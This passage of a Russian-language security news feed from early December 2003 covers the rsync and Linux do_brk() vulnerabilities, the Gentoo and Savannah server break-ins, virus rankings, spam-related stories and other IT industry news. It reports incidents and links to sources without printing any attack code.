пользователей почты @km.ru спам с вашим адресом - вы будете завалены письмами на подтверждение. Причем с вашей точки зрения это будет не спровоцированной атакой со стороны KM.RU. В такой ситуации ваш провайдер может просто запретить получение писем с этого домена". Более подробно - http://www.runet.ru/events/4217.html
5/12/2003 15:40 Из voffka.com.
Дабы несколько развеселить уважаемую публику, приведу одну историю с сайта voffka.com, благо она имеет некоторое отношение к теме, довольно часто возникающей в наших новостях (прим. ньюсмейкера - тем не менее, прошу не считать это рекламой сайта, к нему у меня отношение довольно неоднозначное ;) ). Ученик ПТУ-14 из Москвы Андpей Щyкин (фамилия, имя изменены) выигpал в сyде дело пpотив Замосквоpецкого военкомата. Соответствyющее pешение было пpинято на сегодняшнем заседании Московского гоpодского сyда под пpедседательством сyдьи Александpы Пyшниной. Hапомним, что месяц назад Андpей подал сyдебный иск пpотив Замосквоpецкого военного коммиссаpиата. Сyть пpетензий Андpея сводилась к следyющемy: емy надоело, что из данного yчpеждения в его почтовый ящик pегyляpно постyпает непpошенная коppеспонденция, а именно повестки. Молодой человек теpпел почти 10 месяцев, после чего pешил обpатиться в сyд. Адвокат Щyкина - Сеpгей Кypечанов - постpоил обвинительнyю pечь по беспpоигpышномy в наше вpемя пpинципy сpавнения "с цивилизованными стpанами". Он, о, в частноститметил, что подобные действия военкомата классифициpyются как "спам"(spam) и в pяде стpан он запpещен законодательно. В нашей же стpане "кто yгодно и сколько yгодно может забpасывать беззащитного человека бyмажным дождем". По словам адвоката, его клиент все это вpемя испытывал дyшевный дискомфоpт, волнение и даже стpах, что недопyстимо в демокpатическом обществе. Расчет обвинения оказался веpным. Сyдья Пyшнина, молодая и совpеменная женщина, вынесла беспpецедентное pешение - yдовлетвоpить иск по всем тpем пyнктам. Во-пеpвых, взыскать с Замосквоpецкого военкомата 17 тысяч pyблей в качестве компенсации моpального yщеpба. Во-втоpых, пpекpатить отпpавкy непpошенной коppеспонденции г-нy Щyкинy. В-тpетьих, снабдить все высылаемые докyменты, в т.ч. повестки, соответствyющими текстами типа: "Для отказа от дальнейшего полyчения данной pассылки отпpавьте письмо со одним словом UNSUBSCRIBE по следyющемy адpесy". Источник - http://www.voffka.com
5/12/2003 13:17 Microsoft предлагает покупать у неё лицензии на FAT.
Как пишет linux.org.ru, Microsoft утверждает, что FAT была одной из первых разработаной ей технологий. По их версии первоначальную реализацию FAT создал Билл Гейтс в 1976 году во время своего короткого пребывания в отеле города Альбукерке (США, штат Нью-Мексико). Эта реализация была осуществлена в системе основаной на BASIC. Затем Intel интегрировала FAT в созданую ей операционную систему для своего процессора 8086. В дальнейшем Microsoft приобрела права на эту операционную систему и переписала FAT как часть первой версии MS-DOS. Теперь Microsoft обладает рядом патентов на FAT и предлагает покупать у неё лицензии на использование FAT по цене 25 центов за систему при максимальной цене 250000 американских долларов на производителя. Кроме того, каждая реализация FAT должна будет пройти соответствующую сертификацию у Microsof. В связи с этим возникает вопрос - что будет с поддержкой FAT в Linux и в других свободных операционных системах? Источник - http://www.microsoft.com/mscorp/ip/tech/fat.asp
5/12/2003 12:55 Сервер GENTOO был взломан из-за уязвимости в rsync.
Обнаружена серьёзная уязвимость в системе rsync (система для удалённой синхронизации файлов между клиентами и сервером). Из-за неверной проверки границ в коде запроса к серверу, можно удалённо выполнить произвольный код в системе с привилегиями rsync-сервера. Как пишется в вышедшем бюллетене GENTOO, именно используя эту уязвимость, злоумышленник взломал один из серверов проекта (мы об этом писали вчера). Однако, во всех дистрибутивах Linux полномочий rsync-сервера недостаточно для выполнения "разрушительных" действий, поэтому в довесок к уязвимости rsync была использована уязвимость в функции brk() для получения прав суперпользователя (о ней мы тоже писали). Все основные дистрибуторы Linux обновили версии своего ПО. Если нет возможности обновиться рекомендуется фильровать порт 873/tcp, на котором висит rsync-сервис. Напомним, что уязвимости подвержены именно сервера, в клиентской части уязвимости нет. Подробности - http://www.secunia.com/advisories/10353/
5/12/2003 10:34 Sobig-F признан вирусом года.
Компания Sophos, специализирующаяся на вопросах компьютерной безопасности, подвела предварительные итоги изучения вирусной активности в 2003 году. Бесспорным лидером хит-парада является червь Sobig-F, ответственный почти за пятую часть всех заражений. Данная вредоносная программа, напомним, появилась в августе 2003 г. и за считанные дни, в буквальном смысле слова, наводнила Всемирную сеть. Некоторые серверы фиксировали до нескольких сотен тысяч инфицированных сообщений в день, а ущерб от разрушительного шествия Sobig исчисляется миллионами долларов США. Второе место списка Sophos занимает еще один интернет-червь - Blaster, также появившийся в августе 2003 г. Этот вирус, в отличие от Sobig-F, распространяется не по электронной почте, а через критические дыры в операционных системах Windows. На долю Blaster пришлось 15,1% заражений. Что касается тенденций развития вредоносных программ, то сотрудники Sophos отмечают резкий скачок численности троянов, открывающих "черные ходы" в удаленных системах. Весьма неприятен и тот факт, что вирусописатели начали объединять усилия со спамерами. Результатом такой деятельности стало, к примеру, появление вирусов Mimail-E и Mimail-H, которые позволяют организовывать DoS-атаки на антиспамовые серверы. А трояны вроде Regate-A и Dmomize-A, напротив, могут рассылаться с целью превращения обычных ПК в платформы для отправки сотен тысяч писем рекламного характера. Подробности - http://www.sophos.com/pressoffice/pressrel/uk/20031203yeartopten.html
5/12/2003 10:01 Новая версия почтовой службы MSN Hotmail.
Компания Microsoft представила 3 декабря обновленную версию своей почтовой службы MSN Hotmail. Основными нововведениями в Hotmail являются новые средства борьбы со спамом и интерфейс, который, по мнению специалистов компании, будет удобнее для пользователей. Кроме того, в новой версии Hotmail улучшена интеграция с интернет-пейджером MSN Messenger. В Microsoft попытались приблизить интерфейс Hotmail к интерфейсу пакета Outlook 2003. В частности, при работе с почтой в Hotmail используются кнопки и значки, аналогичные применяющимся в новой версии Outlook. В интерфейсе Hotmail теперь есть три закладки. Первая из них, Today, активна по умолчанию. На ней отображаются заголовки писем, пришедших от известных отправителей, статистика фильтрации спама, а также индикатор заполненности ящика. Если пользователь откроет закладку Mail, то сможет работать со всеми папками почтового ящика. Наконец, папка Contacts служит для управления контактами. Для фильтрации спама в Hotmail заложены сразу несколько инструментов. Во-первых, фильтры, лицензированные у компании Brightmail, будут отсеивать наиболее явный спам еще до того, как он попадет в ящики отдельных пользователей. Далее в дело вступят интеллектуальные фильтры на базе созданной в Microsoft технологии SmartScreen, которая обеспечивает фильтрацию спама по статистическим алгоритмам. Источник - http://www.compulenta.ru
4/12/2003 17:02 DOS-атака на президента.
Сайт "Владимир ВладимировичТМ" несколько дней являлся объектом мощнейших хакерских атак, преследующих его по пятам. Проблемы исчезли так же неожиданно, как и появились. В течение нескольких дней пользователи испытывали трудности с загрузкой сайта http://vladimir.vladimirovich.ru. Ясность внес сам Максим Кононенко, заявив, что ресурс подвергается мощным DOS-атакам. Проблемы начались еще 25 ноября, когда был атакован сервер "ДНИ.ру" - издание некоторое время помогало проекту Паркера с хостингом. "Как только "Владимир ВладимировичТМ" оттуда был уведен к хостеру "Маверик", атака последовала за ним, - рассказывает Максим Кононенко. - Тогда сайт вывели в сторону от остальных проектов "Маверика", - и атака снова последовала за ним. Несколько дней сайт был практически недоступен, но сейчас все само самой утихло". Изначально были подозрения, что объектом атак был другой проект, посвященный Алле Борисовне. Был даже потенциальный подозреваемый, который написал скрипт и постоянно голосовал на сайте за все истории подряд минимальной оценкой. Однако выяснилось, что атаки преследуют "Владимир ВладимировичТМ". Паркер не связывает все произошедшее с грядущими выборами: "Выборы - они в другом мире происходят. Владимир Владимирович про выборы ничего не знает. Он страной руководит". Сайт остался на том же хостинге, где и размещался ранее. Падение посещаемости было во время атаки, сейчас ситуация стабилизируется. Источник - http://www.internet.ru
4/12/2003 16:28 Microsoft: Windows в каждую машину.
Первая цель софтверного гиганта заключалась в глобальной компьютеризации каждого дома. Теперь его взгляд сконцентрирован на автомобилях. «Мы хотим, чтобы одна из наших операционных систем стояла в каждой машине на Земле», - сказал Дик Брасс, вице-президент автомобильного бизнес - подразделения компании. Автомобили с ПО от Microsoft сообщают водителю о необходимости сменить масло. Они предупреждают об авариях на дороге впереди и выдают информацию об альтернативном пути проезда местности. К тому же, автоматически оплачивают проезд по автострадам. Платформа Microsoft установлена уже в 23 моделях, среди которых, BMW 7 серии, Citroen, Daimler, Fiat, Volvo, Hyundai, Mitsubishi, Subaru и Toyota. Честно говоря, подобная тенденция M$, учитывая известную "дырявость" ОС оной, кажется угрожающей. ;) Источник - http://www.ap.org/
4/12/2003 15:56 США беззащитны перед угрозой кибертерроризма?
Как заявили 3 декабря представители американского министерства национальной безопасности, ущерб, который был нанесен в этом году вирусом Blaster, заразившим полмиллиона компьютеров, – просто детская игрушка по сравнению с тем, что может сделать настоящая террористическая кибератака. Выступая перед 350 руководителями хайтек-компаний, собравшимися на первый Национальный саммит по компьютерной безопасности, министр национальной безопасности Том Ридж (Tom Ridge) призвал ИТ-индустрию объединить свои усилия в борьбе с кибертерроризмом, отметив, что «враги свободы используют те же приемы, что и хакеры». По словам Тома Риджа, интернет и корпоративные сети, на которых держится современная индустрия, «представляют собой заманчивую цель для террористов». По словам Тома Риджа, в первой половине этого года было выявлено боле 76 тыс. уязвимостей, которыми могли воспользоваться злоумышленники. Американский министр национальной безопасности призвал топ-менеджеров ИТ-сектора «быть такими же неутомимыми и целеустремленными, как хакеры», чтобы, объединившись, оказать отпор кибертерроризму. Он отметил также, что пробные атаки на банковские, корпоративные и государственные сети выявили нерешенные еще проблемы со взаимодействием корпоративных и государственных служб. Как заявил на саммите Амит Йоран (Amit Yoran), директор Особого отдела компьютерной безопасности (National Cyber Security Division), атаки, которые предпринимались до сих пор злоумышленниками, были относительно бесхитростными и не очень разрушительными. Что же касается тренировочных атак, которые проводило само министерство, то, по его словам, уровень защищенности сетей американского правительства следует назвать недопустимым. Американские чиновники опасаются хаоса, который может наступить в результате хакерских атак на телекоммуникационные системы, банковские, торговые сети и прочую ИТ-инфраструктуру. Источник - http://www.cnews.ru
4/12/2003 15:23 Версия LindowsOS для портативных компьютеров.
Компания Lindows, основанная бывшим исполнительным директором MP3.com Майклом Робертсоном, представила новую версию своей одноименной операционной системы. Основной отличительной особенностью данной ОС на базе открытых исходников, напомним, является совместимость с наиболее популярными Windows-приложениями. Новая версия LindowsOS Laptop Edition рассчитана на использование в портативных компьютерах. Среди основных отличий пакета от стандартных дистрибутивов производитель выделяет следующие моменты. Во-первых, при закрытии крышки ноутбука или нажатии на специальную клавишу компьютер автоматически переводится в спящий режим, характеризующийся пониженным энергопотреблением. Во-вторых, в LindowsOS Laptop Edition появился индикатор заряда батарей (см. скриншот), информирующий владельца об оставшемся времени автономной работы. В-третьих, производитель реализовал в операционной системе расширенную поддержку устройств беспроводной связи. Наконец, в-четвертых, ОС позволяет работать с "горячими" клавишами, посредством которых запускаются наиболее часто использующиеся приложения, вроде почтового клиента или интернет-браузера. Источник - http://www.compulenta.ru
4/12/2003 15:09 Кондор с плюсом.
Как сообщает www.bugtraq.ru, Digital Security выпустила в свет "Кондор+" - новый программный комплекс проверки политики информационной безопасности компании. Основные отличия от вышедшего в начале осени "Кондора" - полностью переработанный интерфейс и блок оценки уровней рисков. Подробности - http://dsec.ru/soft/kondor.php
4/12/2003 14:16 Взлом одного из серверов Free Software Foundation.
А вот и ещё один камешек в огород Linux (что, собственно, огорчает ещё больше). Как сообщает dotcoder на сайте linux.org.ru, 1-го декабря 2003 года было выявлено, что система "Саванна", поддерживаемая Free Software Foundation, и предоставляющая услуги CVS и разработки проектов GNU и других Free Software проектов была скомпрометированна примерно 2-го ноября 2003 года. Характер взлома имеет схожость с недавними взломами серверов Debian: видно, что взломщик действовал одинаково. По ходу следствия было также выявлено, что 2-го ноября 2003 года неизвестная сторона полчив root-а установил руткит ("SucKIT"). На данный момент идет восстановление услуг и к пятнице, 5-го декабря 2003 г. обещают восстановить минимальный набор услуг. Подробности - http://savannah.gnu.org/statement.html
4/12/2003 13:08 Патч против ARP Poisoning в FreeBSD.
ОДин из наших соотечественников объявил в BUGTRAQ о доступности нового патча, который предотвращает изменение MAC-адреса в подконтрольной сети. Если ARP-ответ об изменении MAC-адреса был принят без запроса от сервера, оный визжит об этом в соответствующий лог-файл, однако изменения в ARP-таблице всё же проводит. После применения патча система до изменения ARP таблице посылает однонаправленный (unicast) пакет для сетевой карты, которая имела старый MAC-адрес и если сетевая карта отвечает - изменения в таблице не производятся. Подобный патч для ОС Linux был ранее выпущен господином buggzy. Новый патч предназначен для ОС FreeBSD версий 4.6 - 5.0. Для примения патча необходимо выполнить последовательность действий (после скачивания патча, естественно): # cd /sys/netinet; patch < /path/to/patch, после чего перестроить ядро. Патч - http://freecap.ru/if_ether.c.patch
4/12/2003 12:45 Взлом одного из сереверов проекта Gentoo.
Как сообщил Daniel Robbins из Gentoo Technologies, Inc., которая занимается выпуском и поддержанием одного из дистрибутивов Linux под названием Gentoo, сообщил BUGTRAQ, что один из серверов, обеспечивающих ротацию пакетов - rsync.gentoo.org был взломан через удалённый эксплоит, подробности которого пока не раскрываются. Взлом был обнаружен 2 декабря около 03:45 UTC. Сам сервер сейчас отключён от сети для проведения детального анализа, чему поможет установленная на сервере система IDS и система проверки целостности файловой системы. После взлома злоумышленник установил в системе руткит и модифицировал/удалил некоторые лог-файлы для скрытия следов. Сервер находился под управлением хакера около 1 часа до того момента, как был отключён. За это время, как утверждается, около 20 пользователей успели "синхронизировать" свой софт с сервером (emerge sync). Так как сам сервер не принадлежит инфраструктуре gentoo.org, а принадлежит одному из спонсоров проекта, имя его не раскрывается. Сейчас команда проводит детальный анализ и позже его опубликует. Всем пользователям рекомендуют засинсхронизироваться с сервером (emerge sync). После взлома нескольких серверов Debian взлом ещё одного из дистрибьютеров Linux выглядит довольно настораживающе... Источник - http://www.securityfocus.com
3/12/2003 16:49 В Японии арестованы пользователи файлообменных сетей.
В Японии арестованы два пользователя файлообменной сети Winny, создатели которой гарантировали свои клиентам анонимность, сообщает CNET Asia. Кроме того, полиция провела обыск в доме самого разработчика Winny. Сеть Winny действует на базе более известной сети Freenet и предлагает свои услуги почти 250 тысячам пользователей. Главным ее отличием от Kazaa и других аналогичных сетей является полная анонимность пользователей. Полицейские не уточнили, каким образом им удалось выйти на задержанных любителей обмена файлами, и что послужило основанием для их ареста. В большинстве стран потребителям услуг файлообменных сетей приходится становиться ответчиками по гражданским искам. Возраст арестованных составляет 41 год и 19 лет. 41-летнему пользователю среди прочих правонарушений инкриминируется незаконное распространение копий фильма "Игры разума" (A Beautiful Mind), а его 19-летнему подельнику в вину вменяют представление в открытом доступе игры Super Mario Advance. В числе истцов по делу японских пользователей файлообменных сетей выступают несколько компаний, в частности, Nintendo. Источник - http://www.viruslist.com
3/12/2003 14:46 Что можно ждать от NAC.
Представители Cisco Systems объявили в ноябре о развертывании программы Network Admission Control (NAC), ориентированной на предотвращение инфицирования сетей предприятий вирусами и "червями" в результате неконтролируемого доступа абонентов. Лицензия на устанавливаемое в клиентских компьютерах ПО Cisco Trust Agent предоставлена компаниям Network Associates, Symantec и Trend Micro для интеграции с их антивирусным ПО. Комментируя это событие, аналитики Gartner Research отмечают своевременность данной программы в свете постоянно возрастающих вирусных угроз. В то же время они считают, что, поскольку она основана на решениях Cisco, увеличивается зависимость пользователей от продуктов одного производителя. Кроме того возможен конфликт интересов Cisco и разработчиков антивирусного ПО, которые способны изменить планы относительно совместной работы своего ПО с Trust Agent. Источник - http://www.osp.ru
3/12/2003 14:06 W32/Mimail-L - месть спамеров.
Организации по борьбе со спамом стали жертвами нового интернет-червя. Эксперты полагают, что червь W32/Mimail-L является делом рук мстительных спамеров, которые стремятся парализовать работу организаций по борьбе с потоком несанкционированных электронных сообщений. "Это уже третья разновидность вируса Mimail, которая к нам поступила, только на этот раз червь активнее", - сказал Стив Линфорд, основатель Spamhaus Project, британской группы, которая занимается поиском отправителей электронного мусора. Согласно данным антивирусной компании Sophos, червь Mimail-L находится в прикрепленном файле, который приходит на электронный адрес получателя от женщины по имени Венди, предлагающей ознакомиться с несколькими своими эротическими фотографиями. Вирус активизируется при попытке открыть вложенный файл, после чего автоматически рассылает себя по всем найденным адресам. Червь превращает компьютер пользователя в "зомби", управляемый извне и начинающий отправлять бесконечный поток фальшивых сообщений на один из сайтов в интернете, например, на сервер Spamhaus с целью организации DDoS-атаки. Еще одной пакостью, придуманной авторами вируса, является электронное сообщение, приходящее на адрес жертвы, которой сообщается, что компьютерный диск с якобы заказанной пользователем детской порнографией будет доставлен на его почтовый адрес, а соответствующая сумма будет списана со счета. "В случае, если Вы хотите аннулировать заказ или у вас есть какие-либо претензии, просим писать на следующий адрес", - любезно предлагают мошенники. В качестве адреса дается адрес почты одной из восьми антиспамерских организаций. Линфорд полагает, что червь написан программистами одной из трех спамерских банд, которые в прошлом уже совершали DDoS-атаки на сервер его организации. Источник - http://www.cnews.ru
3/12/2003 12:08 Системы обнаружения вторжений WLAN.
На сайте secure.com.ru опубликована статья о системах обнаружения вторжений в беспроводные сети (Wireless IDS). В статье объясняется потребность в обнаружении беспроводных вторжений, ткже описываются системы обнаружения беспроводных вторжений (WIDS), их преимущества и недостатки. Статья - http://www.secure.com.ru/modules.cfm?block=portal_b_ids&id=32321D25-CF17-F843-A88151A674FE2168
3/12/2003 11:43 Эксплоит уязвимости в ядре Linux.
Мы вчера писали об обнародовании уязвимости в ядре Linux (в функции do_brk()). Хотелось бы заметить, что об этой уязвимостии сообщалось ещё в сентябре Андрю Мортоном, однако был выпущен только патч, нового ядра решили в тот момент не выпускать (что, однако, пришлось сделать после громкого взлома серверов Debian). Также мы вчера писали, что Christophe Devine выпустил эксплоит на ассемблере, который позволяет использовать уязвимость. По ссылке ниже приведён этот самый код. Эксплоит - http://packetstorm.linuxsecurity.com/0312-exploits/brk_poc.asm
3/12/2003 11:17 Семинар Системных Администраторов и Инженеров.
Портал SysAdmins.RU при информационной поддержке журнала "Системный Администратор" проводит Второй Семинар Системных Администраторов и Инженеров. На семинаре будут освещены проблемы информационной безопасности, вопросы управления информационными системами, планирование карьеры и многое другое. Так-же на семинаре состоится Первое собрание профсоюза специалистов в области информационных технологий, будут проведены выборы Правления профсоюза и выработана программа действий профсоюза на 2004 год. Мероприятие будет интересно и полезно системным и сетевым администраторам, инженерам, IT-аналитикам, IT-директорам и менеджерам. Опыт проведения первого семинара (SYSM.01 - прошёл 12 июля сего года) показал, что данное мероприятие вызывает живейший интерес специалистов IT-индустрии. Семинар состоится в субботу, 20 декабря (20.12.2003). Начало регистрации участников в 11-00 по Московскому времени, продлится до 20-00. Семинар будет проводиться в очень уютном и удобном месте - Доме ветеранов кино (ДВК). Подробности - http://sysadmins.ru/news/index.php?news=678
3/12/2003 11:02 Попытка создания профсоюза IT-специалистов.
Коллеги с сайта www.sysadmins.ru выступилли с довольно интересной и, главное, необходимой инициативой, цель которой - создание профсоюза IT-специалистов. Идея профсоюза IT-специалистов витала в воздухе давно. В профильных конференциях в Сети периодически поднималась эта тема. Многие IT-специалисты чувствуют потребность в такой организации, которая сможет защитить их права в области труда, трудовых отношений и трудоустройства, поможет развиваться в профессиональном плане независимо от работодателя, предоставит льготный отдых наконец. Учредительное собрание профсоюза пройдёт 20 декабря 2003 на конференции SYSM.02 (о которой мы расскажем в следующем посте). Посетив приведённую ниже ссылку, желающие могут ознакомиться с уставом Профсоюза, а также макетами профсоюзного удостоверения и печати. Подробности - http://sysadmins.ru/news/index.php?news=679
3/12/2003 10:55 Хакеры взломали одноразовую фотокамеру.
Как сообщает "Компьюлента", в середине августа компания Ritz Camera Centers вышла на рынок с одноразовыми цифровыми фотоаппаратами Dakota Digital стоимостью около 11 долл. США. Для получения снимков пользователям таких устройств нужно было отправить камеру в один из специализированных сервисных центров, в котором изображения извлекались из памяти, распечатывались или записывались на компакт-диск и высылались обратно по указанному адресу. На днях стало известно, что хакерам удалось "взломать" защиту Dakota Digital: теперь посредством специальных программных средств закачать снимки в компьютер можно, что называется, в домашних условиях - для связи с ПК применяется интерфейс USB. Одноразовые фотоаппараты Dakota Digital комплектуются двухмегапиксельными матрицами, памятью на 25 кадров и вспышкой. Причем заряда батареи должно хватить примерно на 100 изображений. Фокусное расстояние камеры составляет 45 мм в пересчете на 35-миллиметровый эквивалент. При этом, по заявлению производителя, качество полученных снимков сравнимо с качеством фотографий, сделанных устройствами ценой в 200, а то и 250 долларов США. Таким образом, благодаря стараниям хакеров владельцы Dakota Digital получили в свои руки вполне приличный цифровик за смешную цену. Компания-производитель пока никак не отреагировала на информацию о взломе. Подробности - http://www.dpreview.com/news/0311/03111301digidisposablehacked.asp
2/12/2003 15:46 Строители чуть было не сожгли часть Рунета.
Вчера произошёл пожар на главном узле Рунета - площадке ММТС 9. Если бы возгорание не удалось ликвидировать, это могло бы иметь серьёзные последствия для российского Интернета. Хотя официальной информации на этот счёт нет, runet.ru удалось восстановить картину проишествия. По словам очевидцев, пожар был на пятом этаже здания ММТС 9, что расположено по адресу улица Бутлерова, дом 7. Виновниками возгорания, по сведениям нашего источника, стали строители, осуществляющие там ремонтные работы. В результате весь этаж оказался в дыму. К счастью, техническая площадка не пострадала, поэтому никаких проблем со связью не наблюдается. Если бы пожар не был остановлен, то это негативно отразилось бы на работе российского сегмента Всемирной паутины. Дело в том, что через ММТС 9 (или попросту М9) интернет-провайдеры осуществляют обмен трафиком друг с другом. Правда, «апокалипсиса» всё равно бы не произошло, поскольку в прошлом году М9 потеряла свою монополию. Случилось это после перехода провайдеров к использованию для взаимодействия между собой распределённой сети MSK-IX, где ММТС 9 всего лишь одна из восьми точек. Источник - http://www.runet.ru
2/12/2003 15:11 Безопасность в Microsoft.
Michael Howard анонсировал доступность на сайте M$ документа под названием "Security at Microsoft", в котором описывается - что и как делается группой по исследованию безопасности Microsoft (она же - Microsoft Corporate Security Group) для улучшения безопасности операционных систем, выпускаемых этой корпорацией. Судя по обилию уязвимостей в последнее время, делается очень "много"! ;))) Тем не менее, документ заслуживает внимания. Документ - http://www.microsoft.com/technet/itsolutions/msit/security/mssecbp.asp
2/12/2003 14:22 Локальная уязвимость в ядре Linux.
Сразу целый ряд производителей дистрибутивов Linux сообщил об обновлении версий ядра, включённых в эти дистрибутивы. Как сообщается, уязвимость заключается в некорректной проверке границ в функции do_brk(), что позволяет локальному злоумышленнику, путём выполнения кода повысить свои полномочия до суперпользователя. Уязвимость существует в версиях ядра до 2.4.22 включительно. Кроме того, Christophe Devine опубликовал пример эксплоита на ассемблере. Debian, RedHat, Mandraik, Trustix уже обновили свои дистрибутивы. Подробности - http://www.securityfocus.com/archive/1/346180/2003-11-29/2003-12-05/0
2/12/2003 13:15 Закончено расследование резонансного дела "бахмачских хакеров".
Уголовное дело, возбужденное в прошлом году против группы так называемых "бахмачских хакеров", похищавших деньги из Бахмачского отделения Сберегательного банка Украины, расследовано и закрыто. Преступники осуждены на 7-8 лет лишения свободы с конфискацией имущества. Об этом на пресс-конференции в Чернигове сообщил прокурор области Николай Лесовой. В состав преступной группы входили майор налоговой милиции города Бахмача и два инженера-программиста. Один из них, работник Бахмачского отделения Сбербанка похитил оттуда тайную компьютерную программу для осуществления электронных платежей и подобрал учреждения, имевшие на счетах значительные средства. Со счетов преступники и "перекачали" 247 тыс. грн. на счет одной из донецких частных фирм с целью дальнейшего переведения их в денежную наличность. После удачно проведенной операции, члены преступной группы решили присвоить еще 2 млн. грн. Однако компьютер заблокировал перечисление такой большой суммы и сообщил о ситуации работникам Черниговского Сбербанка. В результате преступники были разоблачены и арестованы. Дело расследовал следственный отдел прокуратуры Черниговской области, а приговор вынес Бахмачский районный суд. Источник - http://www.crime-research.ru
2/12/2003 12:44 "Хит-парад" вирусов ноября от "Лаборатории Касперского".
"Лаборатория Касперского" опубликовала традиционную "двадцатку" ноября 2003 г. Согласно этому рейтингу, на первом месте - червь Mimail.c - 34,57%, на втором - его сородич модификации "g" - 15,16%, на третьем - Swen с 13,01% зафиксированных вирусных инцидентов. Если подводить общие итоги, то можно сказать следующее. Значительно уменьшилось число троянских программ, на этот раз в рейтинге всего две вредоносные программы этого типа (утилиты несанкционированного управления — backdoor) — Agobot и SdBot, да и те потеряли 7 и 14 мест соответственно и замыкают собой вирусную двадцатку ноября. Таким образом, сетевые черви окончательно монополизировали вирусную статистику, отдав «троянцам» чуть более полпроцента рейтинга. Компьютерные вирусы впервые вообще покинули двадцатку. В двадцатке появились следующие новые вредоносные программы: черви семейства Mimail — c,e,f,g,h,j, и Hawawi.g. Повысил свой рейтинг только Sober. Понизили свои показатели Swen, Mimail.a, Sobig.f, Tanatos.b, Lovesan, Agobot, SdBot. В хит-парад вернулись Klez.h, сразу две версии Lentin, Dumaru.a и Lovelorn. Источник - http://www.kaspersky.ru/news.html?id=144353349
2/12/2003 12:02 Владельцы домена .name подверглись хакерской атаке.
Главный сайт компании The Global Name Registry, предоставляющей хостинг в доменной зоне .name, в минувшие выходные подвергся хакерской атаке, сообщает газета The Sydney Morning Herald. По словам президента The Global Name Registry Хэкона Хонеса (Hakon Haugnes), приблизительно за неделю до инцидента администраторы компании установили на серверы новые версии программного обеспечения Apache и PHP. Злоумышленники сумели воспользоваться недостатком в системе безопасности одного из серверов и получили доступ к индексному файлу. «Помимо файла index.php никаких других данных изменения не коснулись. Хакер не мог получить доступ к другой информации, поскольку наш веб-сервер физически и географически отделен от регистрационной системы. В выходные нам пришлось отключить веб-серверы, чтобы их подготовить к подобным инцидентам в будущем», — сказал Хонес. Источник - http://www.viruslist.com
2/12/2003 11:50 Малайзийские пираты выпустили в продажу новую версию Windows.
По сообщению "Компьюленты", малайзийские изготовители пиратского программного обеспечения предлагают уличным покупателям приобрести версию операционной системы Windows, легальное появление которой на рынке ожидается не ранее 2005 года, сообщает Reuters. Уже сейчас всего за шесть ринггитов (чуть больше 45 рублей) в Малайзии можно приобрести компакт-диск с операционной системой Longhorn. В то же время в США лицензионное издание Windows XP стоит около 100 долларов. По словам представителя юридической службы Microsoft Джонатана Сельвасегарама, пираты предлагают покупателям раннюю версию Longhorn, ознакомиться с которой можно было на конференции программистов в Лос-Анджелесе в октябре. "Это не готовый продукт. Даже если он работает, установка его на компьютер пока является очень рискованным делом", - сказал Сельвасегарам. Подробности - http://story.news.yahoo.com/news?tmpl=story&...
1/12/2003 13:26 Sobig жил! Sobig жив... Sobig будет жить?
А ведь этот вирус должен был совершить торжественное харакири почти три месяца назад. Как сообщает агентство CNET со ссылкой на компанию MessageLabs, в ноябрьском рейтинге наиболее активных вирусов небезызвестный Sobig.F все еще держится в числе лидеров, занимая почетное третье место. И это, заметьте, притом, что соответствующая заплатка была выпущена Microsoft еще в августе. Ранее предполагалось, что распространение вируса будет автоматически прекращено 10 сентября. По мнению аналитиков MessageLabs, вирус обязан своим существованием... специалистам по компьютерной безопасности, своевременно принявшим энергичные меры для прекращения распространения эпидемии. На начальной стадии распространения Sobig.F автор рассчитывал, что в один прекрасный день все установленные на пораженных компьютерах копии вируса обратятся к нескольким серверам за небольшим фрагментом кода, в котором получат инструкции о проведении DoS-атаки против нескольких неназванных сайтов, а также команду на последующую самоликвидацию. Источник - http://www.internet.ru
1/12/2003 13:02 Недельный отчёт о вирусах Panda Software.
Как и положено, Panda Software опубликовала, ставший уже традиционным, еженедельный отчёт о вирусах. В отчёте рассмотрены четыре абсолютно различных вредоносных кода: Sysbug.A, Psshutdown.A, Randex.BF и Dialer.CB. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=216
1/12/2003 12:57 Менеджера отдела маркетинга уволили за рассылку спама.
Руководство австралийской компании Ezysend, предлагающей в интернете фрахтовые услуги, уволило менеджера департамента маркетинга за рассылку спама. Таким образом сотрудник занимался продвижением услуг Ezysend. По словам управляющего директора Ezysend Даррена Гибсона (Darren Gibson) уволенный менеджер занимался рассылкой спама без разрешения совета директоров компании. В связи с этим Гибсон предупредил руководителей других компаний о необходимости взвешенного подхода к проведению маркетинговых акций в интернете. Гибсон особо отметил, что Ezysend придерживается жесткой антиспамовой политики. В трудовом договоре менеджеров отдела маркетинга даже указан специальный пункт, запрещающий использовать спам для продвижения компании на рынке. Нарушение именно этого пункта и стало основанием для увольнения недобросовестного сотрудника. Спам с описанием услуг фрахтовой компании рассылался пользователям с серверов сторонней организации, то есть был оплачен уволенным менеджером из бюджета Ezysend. Чтобы избежать подобных прецедентов в дальнейшем Гибсон намеревается ужесточить контроль за расходами отдела маркетинга. Подробнее - http://www.viruslist.ru/click?_URL=http://www.zdnet.com.au/newstech/ebusiness/...
1/12/2003 12:25 Совместные программные решения для банкоматов Diebold.
Компании ЛАНИТ и Compass Plus, специализирующаяся в области технологий создания больших программных систем, разработки программных продуктов для автоматизации систем электронных платежей и оказания процессинговых и консалтинговых услуг, совместно разработали и протестировали программные решения для работы с микропроцессорными картами и проведения депозитарных операций (cash-in) на банкоматах Diebold. Данные решения позволят банкам, работающим с процессинговой системой TranzWare Online v. 3.3, предоставлять клиентам наиболее современные и перспективные услуги на рынке пластиковых карт. В рамках совместной деятельности компании разработали и провели адаптацию программных продуктов, обеспечивающих обслуживание микропроцессорных EMV-карт с приложением VSDC в банкоматах Diebold, а также использование комплекса, состоящего из банкомата плюс депозитарное устройство cash-in в процессинговой системе TranzWare Online v. 3.3. В результате появилось решение для реализации банковских продуктов, связанных с депозитарными операциями наличных средств, позволяющее использовать сеть банкоматов, дооснащенных устройствами cash-in в процессинговой системе TranzWare Online v. 3.3. Источник - http://www.osp.ru
1/12/2003 11:43 Минсвязи хочет регулировать IP-телефонный трафик.
